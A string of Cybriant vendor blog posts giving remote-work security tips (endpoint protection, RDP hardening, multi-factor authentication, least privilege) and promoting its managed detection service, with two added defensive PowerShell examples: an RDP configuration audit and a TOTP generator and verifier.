Video conferencing, email and office productivity tools have been very useful during the pandemic. Companies may choose to:

  • Adopt and use additional secure collaboration tools
  • Explore emerging technologies like virtual reality and chatbots for content delivery

#5. Cybersecurity policy

Organizations should consider conducting a risk assessment and establishing enforcement mechanisms such as:

  • Single sign-on
  • Automatic logout from unattended devices
  • Multi-factor authentication

#6. Supply chain and third-party management

The pandemic may make it necessary for your supply chain associates to change their business model. Organizations should consider:

  • Reviewing third-party agreements, for instance with IT providers, to ascertain that they meet the latest requirements and have acceptable liability provisions.
  • Conducting regular cybersecurity audits for all third parties with authorized access to the company network, data, or systems.

#7. Cyber-attack financial protection and recovery

Companies should consider cyber insurance, which can come in handy as a cost-effective financial backstop should they experience a cyber-attack. Enterprises need to:

  • Review their current insurance coverage to identify potential gaps
  • Examine how emerging cybersecurity challenges may fit into the enterprise’s cyber risk transfer strategy
  • Examine possible changes in coverage terms and conditions at renewal. As insurers assess losses after the pandemic, claim patterns may change.

Consider MDR

In the midst of the pandemic, this monitored service for endpoints has become a priority for many organizations. Antivirus on endpoints is not enough to protect your corporate data. The fact is that cyberattacks on endpoints are increasing rapidly in complexity and number. MDR (Managed Detection and Remediation) includes the ability to stop threats before they are able to do any harm. Plus, with a team of security analysts watching your systems 24/7, we’ll help you remediate any issues that may occur.

Learn more about MDR from Cybriant here. 

Final thoughts

The pandemic has brought a new era in cybersecurity, and IT experts who raise their game in protecting their companies during this crisis will be crucial to the re-opening of the economy. Enterprise managers need to keep an eye on the medium and long term, recognizing that telecommuting may become the norm for a majority of the workforce long after the pandemic has ended.

While educating the remote workforce about cybersecurity best practices is a great move, it’s not enough. The cornerstone for success lies in deploying technologies that are effective and quick to adopt.

At Cybriant, we help brands like yours implement strategies that will rapidly increase the breadth and depth of your security protection.


6 Enterprise Security Tips for Remote Workers

The COVID-19 pandemic ushered in a rapid change to the way in which many people work. Here are 6 ways to ensure enterprise IT security. 

White-collar workers have mostly shifted to working remotely from their own homes. Some enterprises facilitated remote work arrangements before the pandemic, but this mode of working is now the norm.

The rapid shift to remote work brings many new security challenges to enterprise IT departments. The perimeter of the corporate network extends to the devices people use at home to connect to the network and do their work.

6 Steps to Ensure Enterprise IT Security

Here are six tips to make sure that your organization’s IT security defenses remain strong regardless of where your employees work from.

#1. Protect All Endpoints

Having the majority of your workforce working remotely leads to a large increase in the number of endpoint devices on your network. Whether your business opts to give employees company-certified laptops or you allow workers to connect to the network from their own devices, it’s imperative to protect these endpoints.

One option for endpoint protection is to use dedicated enterprise endpoint protection software and have it installed on every endpoint device. Another option is to mandate that employees have up-to-date anti-virus software installed on their devices before they can connect to the corporate network.

This can be overwhelming to IT departments, which is why we have created a service called Managed Detection and Remediation (MDR). MDR from Cybriant helps reduce the time between breach and detection, and we can also help stop the threat before it can fully execute. Learn more here: cybriant.com/mdr.

#2. Properly Secure RDP Ports

It’s common for businesses to use remote desktop connections to give employees remote access to the same desktop workstation they would normally use on-premises. Remote workers access those desktops using the proprietary Remote Desktop Protocol (RDP). Cybercriminals frequently look for open RDP ports in an attempt to brute-force their way into remote desktops inside corporate networks.

To properly secure RDP ports, make sure that employees use strong passwords of at least 12 characters to connect to remote desktops. Another important step is to enable automatic updates so that any vulnerabilities in the remote access software are fixed as soon as patches become available.

Organizations may consider VPN as an option. Here is a helpful guide on how to be safe using a VPN. 
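The checks this section calls for (a minimum password length of 12, automatic updates turned on) can be audited on a Windows host in a few lines. The script below is an added example written for this page, not Cybriant's code or a Cybriant tool; it is read-only, assumes PowerShell 5.1 or later on Windows 8.1/Server 2012 R2 or newer (where the NetSecurity cmdlets ship), and uses the English-language firewall group name "Remote Desktop". It also reports two settings the text does not list but that follow from its reasoning: whether Network Level Authentication is required on the listener, and whether the inbound RDP firewall rule accepts connections from any address rather than from the VPN range the section suggests. Function names are hypothetical.

```powershell
# Added example (not Cybriant's code): audit the RDP hardening points from this section on the
# local Windows host. Read-only; run in an elevated PowerShell 5.1+ session on Windows.
function Test-RdpHardening {
    param(
        # Minimum password length the section calls for.
        [int]$MinPasswordLength = 12,
        # Assumption: the firewall rule group name as shown on English-language Windows.
        [string]$RdpRuleGroup = 'Remote Desktop'
    )
    $findings = New-Object System.Collections.Generic.List[string]

    # --- RDP listener -------------------------------------------------------------------
    $ts  = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' -ErrorAction SilentlyContinue
    $tcp = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -ErrorAction SilentlyContinue
    $rdpEnabled = ($null -ne $ts) -and ($ts.fDenyTSConnections -eq 0)
    if ($rdpEnabled) {
        # Network Level Authentication makes the client authenticate before a session is created,
        # so password guessing never reaches the logon screen. UserAuthentication=1 requires it.
        if ($tcp.UserAuthentication -ne 1) {
            $findings.Add('RDP is enabled but Network Level Authentication (UserAuthentication=1) is not required')
        }
        # An enabled inbound RDP rule scoped to "Any" exposes the listener to every network the
        # host is attached to; scope it to the VPN or management ranges instead.
        $rules = Get-NetFirewallRule -DisplayGroup $RdpRuleGroup -Direction Inbound -Enabled True -ErrorAction SilentlyContinue
        foreach ($rule in $rules) {
            $addr = $rule | Get-NetFirewallAddressFilter
            if ($addr.RemoteAddress -contains 'Any') {
                $findings.Add("Firewall rule '$($rule.DisplayName)' allows RDP from any remote address")
            }
        }
    }

    # --- Password policy in effect on this host (local or domain) -----------------------
    # 'net accounts' prints a line such as "Minimum password length:    0"; parse that line.
    $acct = & net accounts 2>$null
    $lenLine = $acct | Where-Object { $_ -match 'Minimum password length:\s+\d+' } | Select-Object -First 1
    if ($lenLine -and ($lenLine -match 'Minimum password length:\s+(\d+)')) {
        $minLen = [int]$Matches[1]
        if ($minLen -lt $MinPasswordLength) {
            $findings.Add("Minimum password length is $minLen; policy requires at least $MinPasswordLength")
        }
    } else {
        $findings.Add('Could not read the minimum password length from "net accounts"')
    }

    # --- Automatic updates --------------------------------------------------------------
    # Policy values under WindowsUpdate\AU: NoAutoUpdate=1 disables Automatic Updates entirely;
    # AUOptions=4 means download and install on a schedule. Absent keys mean Windows defaults apply.
    $au = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU' -ErrorAction SilentlyContinue
    if ($au -and $au.NoAutoUpdate -eq 1) {
        $findings.Add('Automatic Updates are disabled by policy (NoAutoUpdate=1)')
    } elseif ($au -and $null -ne $au.AUOptions -and $au.AUOptions -ne 4) {
        $findings.Add("AUOptions=$($au.AUOptions): updates are downloaded but not installed automatically")
    }
    $wu = Get-Service -Name wuauserv -ErrorAction SilentlyContinue
    if ($wu -and $wu.StartType -eq 'Disabled') {
        $findings.Add('Windows Update service (wuauserv) is disabled')
    }

    [pscustomobject]@{
        ComputerName = $env:COMPUTERNAME
        RdpEnabled   = $rdpEnabled
        Compliant    = ($findings.Count -eq 0)
        Findings     = $findings.ToArray()
    }
}

Test-RdpHardening | Format-List
```

An empty Findings array with Compliant = True means every check passed; each finding names the setting to correct. The password-length check reads the policy actually applied to the host, so on a domain-joined machine it reflects the domain policy rather than a local override.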

#3. Use Multi-Factor Authentication

Multi-factor authentication adds a layer of protection to your IT security environment on top of a strong password policy. With multi-factor authentication, employees can only gain access to systems if they give two or more pieces of identification while signing in. The most practical use of multi-factor authentication is to require a standard username and password combination in addition to a dynamic one-time passcode that only remains valid for one login session.

We consider this a basic of enterprise security. Download our Remote Workers Guide to receive all the remote working tips from Cybriant’s CTO. 
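The "dynamic one-time passcode that only remains valid for one login session" described above is, in most deployments, an RFC 6238 time-based one-time password (TOTP): a six-digit code derived from a shared secret and the current 30-second time step. The script below is an added example written for this page, not Cybriant's code or any product's implementation; it generates and verifies such codes in PowerShell 5.1 or later, and the shared secret it uses is the published RFC 6238 test-vector secret, embedded as constructed sample data. Function names are hypothetical.

```powershell
# Added example (not Cybriant's code): generate and verify an RFC 6238 TOTP, the "dynamic
# one-time passcode" this section describes. Requires PowerShell 5.1+ (uses ::new()).

function Get-HotpCode {
    # RFC 4226 HOTP: HMAC-SHA1 over the 8-byte big-endian counter, dynamic truncation, mod 10^digits.
    param(
        [Parameter(Mandatory)][byte[]]$Secret,
        [Parameter(Mandatory)][long]$Counter,
        [int]$Digits = 6
    )
    $msg = [BitConverter]::GetBytes($Counter)
    if ([BitConverter]::IsLittleEndian) { [Array]::Reverse($msg) }
    $hmac = [System.Security.Cryptography.HMACSHA1]::new($Secret)
    try { $hash = $hmac.ComputeHash($msg) } finally { $hmac.Dispose() }
    # Dynamic truncation: the low nibble of the last byte picks a 4-byte window in the 20-byte hash.
    $offset = [int]($hash[19] -band 0x0F)
    $b0 = [int]$hash[$offset] -band 0x7F
    $binary = ($b0 -shl 24) -bor ([int]$hash[$offset + 1] -shl 16) -bor ([int]$hash[$offset + 2] -shl 8) -bor [int]$hash[$offset + 3]
    $code = $binary % [int][math]::Pow(10, $Digits)
    return ([string]$code).PadLeft($Digits, '0')
}

function Get-TotpCode {
    # RFC 6238 TOTP: the HOTP counter is the number of whole time steps since the Unix epoch.
    param(
        [Parameter(Mandatory)][byte[]]$Secret,
        [long]$UnixTime = [DateTimeOffset]::UtcNow.ToUnixTimeSeconds(),
        [int]$Step = 30,
        [int]$Digits = 6
    )
    Get-HotpCode -Secret $Secret -Counter ([math]::Floor($UnixTime / $Step)) -Digits $Digits
}

function Test-TotpCode {
    # Server-side check: accept the current step and one step either side (clock drift), but
    # never a step at or below the last one consumed, so a code cannot be replayed for a
    # second login session. The caller stores the returned Counter after a successful login.
    param(
        [Parameter(Mandatory)][byte[]]$Secret,
        [Parameter(Mandatory)][string]$Submitted,
        [Parameter(Mandatory)][long]$UnixTime,
        [long]$LastUsedCounter = -1,
        [int]$Step = 30,
        [int]$Window = 1
    )
    $now = [long][math]::Floor($UnixTime / $Step)
    foreach ($c in ($now - $Window)..($now + $Window)) {
        if ($c -le $LastUsedCounter) { continue }   # already consumed: replay attempt
        $expected = Get-HotpCode -Secret $Secret -Counter $c
        if ($expected.Length -ne $Submitted.Length) { continue }
        # XOR every character so the comparison does not stop at the first mismatch.
        $diff = 0
        for ($i = 0; $i -lt $expected.Length; $i++) {
            $diff = $diff -bor ([int][char]$expected[$i] -bxor [int][char]$Submitted[$i])
        }
        if ($diff -eq 0) { return [pscustomobject]@{ Valid = $true; Counter = $c } }
    }
    return [pscustomobject]@{ Valid = $false; Counter = $LastUsedCounter }
}

# Usage with the RFC 6238 SHA-1 test vector: secret "12345678901234567890" at Unix time 59 is
# HOTP counter 1, and the six-digit code is 287082 (the last six digits of the RFC's 94287082).
$secret = [System.Text.Encoding]::ASCII.GetBytes('12345678901234567890')
$code = Get-TotpCode -Secret $secret -UnixTime 59
"TOTP at t=59: $code"
Test-TotpCode -Secret $secret -Submitted $code -UnixTime 59                      # Valid = True, Counter = 1
Test-TotpCode -Secret $secret -Submitted $code -UnixTime 59 -LastUsedCounter 1   # Valid = False (replay)
```

The two things this shows that the paragraph does not are why the code is "dynamic" (it is a function of the time step, so it changes every 30 seconds) and what "valid for one login session" requires of the server: it must remember the last counter it accepted and refuse anything at or below it, otherwise a code captured by a phishing page could be reused within the same time step.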

#4. Inform Employees of Security Risks

IT departments commonly regard employees as weak links in the context of evaluating enterprise IT risks. Remote work exposes employees to more IT security threats than usual, and it’s harder for enterprises to mitigate these threats.

A good way to protect employees against security threats while remote working is to promote awareness of the threats they face. Consider distributing an internal memo that identifies the main threats criminals use to gain access to networks, such as phishing and social engineering. You could also ask employees to repeat any IT security awareness training modules that your company offers.

While awareness is important, we prefer to go back to #1 – ensure the protection of endpoints. If you have a team of security experts watching your endpoints 24/7, you can protect your corporate data no matter what. Learn more about MDR here: cybriant.com/mdr.

#5. Secure Your Video Conferences

Businesses need to maintain face-to-face communication and hold team meetings while people work from home. Video conferencing tools are popular choices for remote work, but this type of software can come with IT security risks.

It’s crucial to make an effort to secure all video conferences held by different teams and departments in your organization. Require passwords to gain access to video calls, and make sure your chosen tool has an alert feature that lets you know when someone new joins the conversation. You should also apply updates to your video conferencing software as soon as they are released.

#6. Protect Your Digital Assets

Your enterprise probably has many assets stored digitally on its network, including marketing materials, website content, illustrations, business plans, and presentations. A significant attack vector for hackers to gain access to valuable digital data is stealing the credentials of an employee who has privileged access to more assets than they need for their daily work.

A vital measure to protect your digital assets is to enforce least-privilege controls on all user accounts. The principle of least privilege limits each user’s access permissions to only the assets they need to perform their daily work.

These decisions are easier to make when you have a security framework in place, such as the NIST Cybersecurity Framework (NIST CSF). Learn more about the importance of people, processes, and technology here.

Closing Thoughts

The flexibility to work remotely some of the time was becoming an important part of what white-collar workers expected from enterprises. The COVID-19 pandemic rapidly altered the dynamics of remote work such that it is now the status quo. By following IT security best practices and tips for remote workers, you can ensure your corporate network and valuable assets remain protected in a new threat landscape.

Related: What Hackers Know about Fileless Malware (And You Should Too)


Could an Endpoint Security Service Be Your Secret Cybersecurity Weapon?

Should you use an endpoint security service? The quick answer is yes, especially if your workers are accessing any corporate data on potentially unsecured endpoints. Read more about how this simple service could be your secret cybersecurity weapon. 

I was recently reading over the Forbes article, “Why Securing Endpoints Is The Future Of Cybersecurity” with some very interesting insights from Verizon’s 2020 Data Breach Investigations Report (DBIR). According to the article: 

Verizon’s DBIR reflects the stark reality that organized crime-funded cybercriminals are relentless in searching out unprotected endpoints and exploiting them for financial gain, which is why autonomous endpoints are a must-have today.

After reading the 2020 Verizon DBIR, it’s clear that if organizations had more autonomous endpoints, many of the most costly breaches could be averted. Autonomous endpoints that can enforce compliance, control, automatically regenerate, and patch cybersecurity software while providing control and visibility are the cornerstone of cybersecurity’s future.

For endpoint security to scale across every threat surface, the new hybrid remote workplace is creating an undeletable tether to every device as a must-have for achieving enterprise scale.

The lack of diligence around Asset Management is creating new threat surfaces as organizations often don’t know the current health, configurations, or locations of their systems and devices. Asset Management is a black hole in many organizations leading to partial-at-best efforts to protect every threat surface they have. What’s needed is more insightful data on the health of every device.

What is an Endpoint Security Service? 

When you outsource your endpoint security service, you have a team of security analysts that monitor your endpoints 24/7 and filter out false positives. You’ll receive alerts when relevant threats are detected, along with advice and insight from our cybersecurity analysts to help you mitigate and respond to the threat.

MDR or Managed Detection and Remediation is what we have named our endpoint security service. As an extension of your team, our experts will investigate, triage, and remediate security events and provide executive-level reporting. Remediation may reveal dormant or trojan threat actors that evade network and endpoint detection solutions. Our MDR solution includes leveraging the talents of our experienced team as well as next-generation antivirus and EDR tools that utilize AI like SentinelOne.

The MDR service from Cybriant will allow you to protect your organization’s data and reduce your threat landscape against the most advanced threats. 

What is an endpoint? 

To put it simply, an endpoint is any device that communicates with the network to which it is connected. Here are some examples of endpoints: 

  • Laptops
  • Desktops
  • Mobile Phones
  • Tablets
  • Servers
  • Virtual Environments

What is the goal of endpoint security? 

According to Gartner, “Organizations investing in endpoint security tools are purposefully moving from an ‘incident response’ mentality to one of ‘continuous monitoring’ in search of incidents that they know are constantly occurring.”

Why do we need endpoint security?

Cybercriminals are leveraging advanced attack toolsets and techniques that can bypass most perimeter security solutions. The tools and techniques that cybercriminals use have outpaced the capabilities of many traditional endpoint security solutions as well. MDR is a cybersecurity technology that addresses the need for continuous monitoring and response to advanced threats.

What is the difference between endpoint security and antivirus?

Endpoint security differs from antivirus in that antivirus covers a single endpoint, whereas endpoint security covers your entire network and protects against security attacks.

Why outsource the monitoring of endpoint security? 

While endpoint security is a powerful tool that addresses the need for continuous monitoring and response to advanced threats, this tool is often difficult to deploy, manage, and monitor particularly at scale in large to mid-sized organizations.

With Managed Detection and Remediation (MDR), you have a team of endpoint security experts who not only utilize next-generation tools on your behalf but also feed information back to your organization on how to respond to alerts. Cybriant’s security team brings together endpoint analysts, incident responders, forensics experts, and security engineers. They understand what normal endpoint activity should look like, when a more thorough investigation is required, when to raise the alarm, and how to respond.

What Hackers Know about Fileless Malware, and You Should Too